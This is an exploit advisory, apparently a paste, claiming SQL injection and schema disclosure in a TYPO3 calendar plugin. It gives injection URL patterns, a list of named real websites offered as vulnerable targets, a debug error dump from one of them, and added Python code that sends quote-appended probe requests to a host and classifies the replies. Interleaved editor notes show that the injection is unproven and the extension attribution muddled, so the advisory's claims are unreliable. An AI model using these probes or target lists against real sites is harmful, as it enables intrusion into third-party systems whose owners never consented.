KingSkrupellos

Typo3 Calendar Base tx_pxkalender_pi1 2.0.0 SQL Inj DB Disc

Feb 18th, 2019
###################################################################################

# Exploit Title : Typo3 Calendar Base tx_pxkalender_pi1 2.0.0 SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/02/2019
# Vendor Homepage : typo3.org
# Software Download Link : extensions.typo3.org/extension/download/cal/2.0.0/zip/
# Software Information Link : extensions.typo3.org/extension/cal/
# Software Version : From 0.7.0 To 2.0.0 / All Versions
# TYPO3 version ranges listed for the extension releases (release states : stable, alpha, experimental) :
#   3.8.0 - 4.3.99, 8.7.99 - 9.5.99, 6.1.0 - 8.9.99, 6.2.0 - 6.2.99, 6.1.0 - 6.2.99, 4.5.5 - 6.0.99
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################################

# Description about Software :
***************************
A calendar combining all the functions of the existing calendar extensions plus adding some new features. It is based on the iCal standard.

###################################################################################

# Impact :
***********
The tx_pxkalender_pi1 plugin 2.0.0 [ and other versions ] for TYPO3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in the application's database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser.

# Note on attribution : the download link and the ext_tables.sql path in this advisory refer to EXT:cal, but the SQL error listed below is raised from tx_pxkalender_pi1->getSingleTermin -> tx_pxkalender_pi1->model_getAbteilungenByUidList. By TYPO3 naming (tx_<extkey>_pi1) that plugin class belongs to an extension keyed pxkalender / px_kalender, not to EXT:cal, whose frontend classes are tx_cal_*. Confirm which extension is actually installed on a target before attributing the issue to either one.

###################################################################################

# SQL Injection Exploit :
**********************

/index.php?L=[ID-NUMBER]&tx_pxkalender_pi1%5Btermin%5D=[ID-NUMBER]&id=[SQL Injection]

/typo3conf/ext/cal/res/PEAR/Date/TimeZone.php?id=[SQL Injection]

# Note : TimeZone.php is a bundled PEAR Date class file. Requested directly it only defines a class and performs no database access, and no error output for that path is shown in this advisory; only the first request is backed by the SQL error listed below. That listing also shows "uid IN ()" in the failed query rather than the quoted id, i.e. the parameter reached the query only after filtering. Confirm actual injectability with a differential test (baseline id versus id with an appended quote, or a boolean / time-based payload) instead of relying on the syntax error alone.

# Database Disclosure Exploit :
**************************

/typo3conf/ext/cal/ext_tables.sql

# Note : ext_tables.sql is the extension's table-definition file (CREATE TABLE statements, shipped with every TYPO3 extension). Reading it discloses the schema (table and column names), not database contents, and for a public TER extension the same file is inside the download linked above. Its value to an attacker is confirming that the extension is installed and learning which tables and columns to target.

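The following is an added example (editor's code, not part of the advisory and not code from EXT:cal or px_kalender) showing what fetching ext_tables.sql from a site actually yields: a parser that reads the table and column names out of the file. The schema text it runs on is constructed for the example, with invented tables tx_example_event and tx_example_organizer laid out the way TYPO3 extensions write ext_tables.sql; it is not the real schema of either extension.

```python
"""Read table and column names out of a TYPO3 extension's ext_tables.sql.

Added example (editor's code, not from the advisory or from EXT:cal). It shows
what /typo3conf/ext/<extkey>/ext_tables.sql discloses: the schema, not data.
SAMPLE_EXT_TABLES_SQL is a constructed file with invented tables in the
layout TYPO3 extensions use; it is not the schema of cal or px_kalender.
"""
import re
from typing import Dict, List, Tuple

# One CREATE TABLE statement; the body is everything up to the ");" that closes it.
_CREATE_RE = re.compile(
    r"CREATE\s+TABLE\s+(?:IF\s+NOT\s+EXISTS\s+)?`?(?P<name>\w+)`?\s*"
    r"\((?P<body>.*?)\)\s*(?:ENGINE[^;]*)?;",
    re.IGNORECASE | re.DOTALL,
)
# Entries that define keys or constraints rather than columns.
_INDEX_RE = re.compile(
    r"(PRIMARY\s+KEY|UNIQUE|FULLTEXT|FOREIGN\s+KEY|CONSTRAINT|KEY|INDEX)\b", re.IGNORECASE
)


def _split_top_level(body: str) -> List[str]:
    """Split a CREATE TABLE body on commas that are outside parentheses and quotes."""
    parts: List[str] = []
    cur: List[str] = []
    depth = 0
    quote = None
    for ch in body:
        if quote:                       # inside a quoted default such as DEFAULT '0'
            cur.append(ch)
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
            cur.append(ch)
        elif ch == "," and depth == 0:  # column separator
            parts.append("".join(cur))
            cur = []
        else:
            depth += (ch == "(") - (ch == ")")   # int(11), KEY parent (pid), ...
            cur.append(ch)
    parts.append("".join(cur))
    return [p.strip() for p in parts if p.strip()]


def parse_ext_tables_sql(sql: str) -> Dict[str, List[Tuple[str, str]]]:
    """Map each table to its (column, definition) pairs, skipping key/index entries."""
    schema: Dict[str, List[Tuple[str, str]]] = {}
    for m in _CREATE_RE.finditer(sql):
        columns: List[Tuple[str, str]] = []
        for entry in _split_top_level(m.group("body")):
            if _INDEX_RE.match(entry):
                continue
            name, _, definition = entry.partition(" ")
            columns.append((name.strip("`"), " ".join(definition.split())))
        schema[m.group("name")] = columns
    return schema


def tables_with_column(schema: Dict[str, List[Tuple[str, str]]], column: str) -> List[str]:
    """Tables carrying the given column; 'pid' marks page-bound TYPO3 records."""
    return [t for t, cols in schema.items() if any(c == column for c, _ in cols)]


# Constructed sample in the layout TYPO3 extensions use (invented table names).
SAMPLE_EXT_TABLES_SQL = """
#
# Table structure for table 'tx_example_event' (constructed sample)
#
CREATE TABLE tx_example_event (
    uid int(11) NOT NULL auto_increment,
    pid int(11) DEFAULT '0' NOT NULL,
    title tinytext,
    start_date int(11) DEFAULT '0' NOT NULL,
    organizer_id int(11) DEFAULT '0' NOT NULL,
    PRIMARY KEY (uid),
    KEY parent (pid)
);

CREATE TABLE `tx_example_organizer` (
    `uid` int(11) NOT NULL auto_increment,
    `name` varchar(255) DEFAULT '' NOT NULL,
    PRIMARY KEY (`uid`)
);
"""

if __name__ == "__main__":
    for table, cols in parse_ext_tables_sql(SAMPLE_EXT_TABLES_SQL).items():
        print(table, [c for c, _ in cols])
```

Run it against a file actually downloaded from a target (or from the TER zip) to get the same listing; the point of the comparison is that both give identical output, which is why the file is a fingerprint rather than a data leak.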
###################################################################################

# Example Vulnerable Sites :
*************************

[+] klinikverbund-suedwest.de/index.php?L=0&tx_pxkalender_pi1%5Btermin%5D=2511&id=3084%27

[+] creation-willigeller.com/typo3conf/ext/cal/ext_tables.sql

[+] kupferdreh.com/typo3conf/ext/cal/ext_tables.sql

[+] cyfra7.com/typo3conf/ext/cal/ext_tables.sql

[+] maska.si/typo3conf/ext/cal/ext_tables.sql

[+] belasso.de/typo3conf/ext/cal/ext_tables.sql

[+] usk-anif.at/typo3conf/ext/cal/ext_tables.sql

[+] emergegroup.com/typo3conf/ext/cal/ext_tables.sql

[+] von-buelow-gymnasium.de/typo3conf/ext/cal/ext_tables.sql

[+] jammertrust.org/typo3conf/ext/cal/ext_tables.sql

[+] mittelhofschule-ellwangen.de/typo3conf/ext/cal/ext_tables.sql

[+] radinfo.at/typo3conf/ext/cal/ext_tables.sql

[+] betriebsratspraxis24.de/typo3conf/ext/cal/ext_tables.sql

[+] gemeinde-gaiberg.de/typo3conf/ext/cal/ext_tables.sql

[+] provincia.livorno.it/typo3conf/ext/cal/ext_tables.sql

[+] bnr.rw/typo3conf/ext/cal/ext_tables.sql

[+] sankt-josef.de/typo3conf/ext/cal/ext_tables.sql

[+] foto-on-line.pl/typo3conf/ext/cal/ext_tables.sql

[+] versicherungspraxis24.de/typo3conf/ext/cal/ext_tables.sql

###################################################################################

# Example SQL Database Error :
****************************

array(4 items)
caller =>

'TYPO3\CMS\Core\Database\DatabaseConnection::exec_SELECTquery' (60 chars)

ERROR =>
***********

'You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') AND pages.deleted=0 AND pages.t3ver_state<=0 AND pages.pid<>-1 AND pages.hidde' at line 1' (228 chars)

lastBuiltQuery =>
****************

'SELECT * FROM pages WHERE 1 AND uid IN () AND pages.deleted=0 AND pages.t3ver_state<=0 AND pages.pid<>-1 AND pages.hidden=0 AND pages.starttime<=1550510640 AND (pages.endtime=0 OR pages.endtime>1550510640) AND (pages.fe_group='' OR pages.fe_group IS NULL OR pages.fe_group='0' OR FIND_IN_SET('0',pages.fe_group) OR FIND_IN_SET('-1',pages.fe_group))' (348 chars)

debug_backtrace =>
******************

'call_user_func#34 // {closure}# // TYPO3\CMS\Frontend\Http\Application->run#33 // TYPO3\CMS\Core\Core\Bootstrap->handleRequest#78 // TYPO3\CMS\Frontend\Http\RequestHandler->handleRequest#307 // TYPO3\CMS\Frontend\Controller\TypoScriptFrontendController->INTincScript#232 // TYPO3\CMS\Frontend\Controller\TypoScriptFrontendController->recursivelyReplaceIntPlaceholdersInContent#3488 // TYPO3\CMS\Frontend\Controller\TypoScriptFrontendController->INTincScript_process#3522 // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#3577 // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->render#859 // TYPO3\CMS\Frontend\ContentObject\UserContentObject->render#943 // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->callUserFunction#40 // call_user_func_array#7316 // tx_pxkalender_pi1->main# // tx_pxkalender_pi1->getSingleTermin#263 // tx_pxkalender_pi1->model_getAbteilungenByUidList#335 // TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTquery#300 // TYPO3\CMS\Core\Database\DatabaseConnection->debug#314' (1043 chars)

# What the listing shows : the failing statement is "SELECT * FROM pages WHERE 1 AND uid IN () AND ...". The IN list is empty, which is by itself a MySQL / MariaDB syntax error (hence "near ') AND pages.deleted=0 ..."), and the quote appended to the id parameter in the example URL does not appear anywhere in the query text. Whatever fed the uid list into tx_pxkalender_pi1->model_getAbteilungenByUidList, the quoted value was filtered out before the list was built and the plugin then ran the query with an empty list. Two things are therefore established by this request : the plugin does not check that the list is non-empty before querying, and the target has TYPO3's SQL debug output enabled ($TYPO3_CONF_VARS['SYS']['sqlDebug'], which is what prints the failed query and a full backtrace to the visitor). That output is an information disclosure in its own right, but proof of injection requires a payload that is reflected into lastBuiltQuery or that changes the response without a syntax error.

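The check described in the note above, as an added example (editor's code, not part of the advisory and not TYPO3 code): it parses the dump format shown in the listing, builds the baseline and quote-appended probe URLs from the advisory's parameter names, and classifies what a response proves (payload reflected into lastBuiltQuery, empty IN list only, other error, or no dump). The sample response is constructed: it embeds the listing's caller, ERROR and lastBuiltQuery values verbatim, with a shortened backtrace, and target.example is a placeholder host.

```python
"""Parse a TYPO3 SQL debug dump and judge what a quoted probe proved.

Added example (editor's code; not from the advisory, not TYPO3 code). The
field layout it parses (caller / ERROR / lastBuiltQuery / debug_backtrace,
each a single-quoted value followed by "(N chars)") is the one in the
advisory's error listing. SAMPLE_RESPONSE is a constructed page that embeds
the listing's caller, ERROR and lastBuiltQuery values verbatim with a
shortened backtrace; target.example is a placeholder host.
"""
import html
import re
from typing import Dict, Optional, Tuple
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import urlopen

# One field of the dump:  name => 'value' (N chars)   (the value may contain quotes)
_FIELD_RE = re.compile(
    r"\b(?P<name>caller|ERROR|lastBuiltQuery|debug_backtrace)\s*=>\s*"
    r"'(?P<value>.*?)'\s*\((?P<len>\d+) chars\)",
    re.DOTALL,
)
# The concrete defect in the listing: an empty IN list, which is a syntax error.
_EMPTY_IN_RE = re.compile(r"\bIN\s*\(\s*\)", re.IGNORECASE)


def build_probe_urls(base_url: str, page_id: int, termin: int, lang: int = 0) -> Tuple[str, str]:
    """Return (baseline, quote-appended) URLs for a differential test.

    Parameter names come from the advisory's exploit line; the appended
    quote is encoded as %27, matching the advisory's example URL.
    """
    def url(id_value: str) -> str:
        query = urlencode({"L": lang, "tx_pxkalender_pi1[termin]": termin, "id": id_value})
        return f"{base_url.rstrip('/')}/index.php?{query}"

    return url(str(page_id)), url(f"{page_id}'")


def parse_sql_debug(body: str) -> Optional[Dict[str, str]]:
    """Return the dump's fields from a response body, or None when no dump is present."""
    text = html.unescape(body)  # the dump may arrive with '=>' and '<' HTML-encoded
    fields = {m.group("name"): m.group("value") for m in _FIELD_RE.finditer(text)}
    return fields if "lastBuiltQuery" in fields else None


def plugin_in_backtrace(dump: Dict[str, str], plugin: str = "tx_pxkalender_pi1") -> bool:
    """True when the failing statement was built inside the named plugin class."""
    return plugin in dump.get("debug_backtrace", "")


def classify_probe(payload: str, dump: Optional[Dict[str, str]]) -> str:
    """What the response to the quoted probe actually demonstrates.

    reflected      payload text is inside lastBuiltQuery: genuine injection
    empty-in-list  input was filtered away and the query broke on "IN ()"
                   (the advisory's own listing)
    error-only     a different SQL error, payload not visible in the query
    no-dump        no debug output; only blind techniques can tell
    """
    if dump is None:
        return "no-dump"
    query = dump.get("lastBuiltQuery", "")
    if payload in query:
        return "reflected"
    if _EMPTY_IN_RE.search(query):
        return "empty-in-list"
    return "error-only"


def probe_host(base_url: str, page_id: int, termin: int) -> str:
    """Fetch the quoted probe and classify the answer (network; not exercised offline)."""
    _, quoted = build_probe_urls(base_url, page_id, termin)
    try:
        with urlopen(quoted, timeout=10) as resp:
            body = resp.read().decode("utf-8", "replace")
    except HTTPError as err:  # a 500 error page can still carry the dump
        body = err.read().decode("utf-8", "replace")
    return classify_probe(f"{page_id}'", parse_sql_debug(body))


# Constructed response body (see module docstring for what is verbatim).
SAMPLE_RESPONSE = (
    "<pre>array(4 items)\n"
    "caller => 'TYPO3\\CMS\\Core\\Database\\DatabaseConnection::exec_SELECTquery' (60 chars)\n"
    "ERROR => 'You have an error in your SQL syntax; check the manual that corresponds to "
    "your MariaDB server version for the right syntax to use near ') AND pages.deleted=0 "
    "AND pages.t3ver_state<=0 AND pages.pid<>-1 AND pages.hidde' at line 1' (228 chars)\n"
    "lastBuiltQuery => 'SELECT * FROM pages WHERE 1 AND uid IN () AND pages.deleted=0 "
    "AND pages.t3ver_state<=0 AND pages.pid<>-1 AND pages.hidden=0 AND pages.starttime<=1550510640 "
    "AND (pages.endtime=0 OR pages.endtime>1550510640) AND (pages.fe_group='' OR pages.fe_group IS NULL "
    "OR pages.fe_group='0' OR FIND_IN_SET('0',pages.fe_group) OR FIND_IN_SET('-1',pages.fe_group))' (348 chars)\n"
    "debug_backtrace => 'tx_pxkalender_pi1->main# // tx_pxkalender_pi1->getSingleTermin#263 // "
    "tx_pxkalender_pi1->model_getAbteilungenByUidList#335 // "
    "TYPO3\\CMS\\Core\\Database\\DatabaseConnection->exec_SELECTquery#300' (190 chars)\n"
    "</pre>"
)

if __name__ == "__main__":
    dump = parse_sql_debug(SAMPLE_RESPONSE)
    print(classify_probe("3084'", dump), plugin_in_backtrace(dump))  # empty-in-list True
```

Against the listing above the verdict is empty-in-list: the quote never reached the statement, so a separate payload (one that survives the plugin's filtering, or a boolean / time-based one when sqlDebug is off) is needed before calling the parameter injectable.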
###################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################################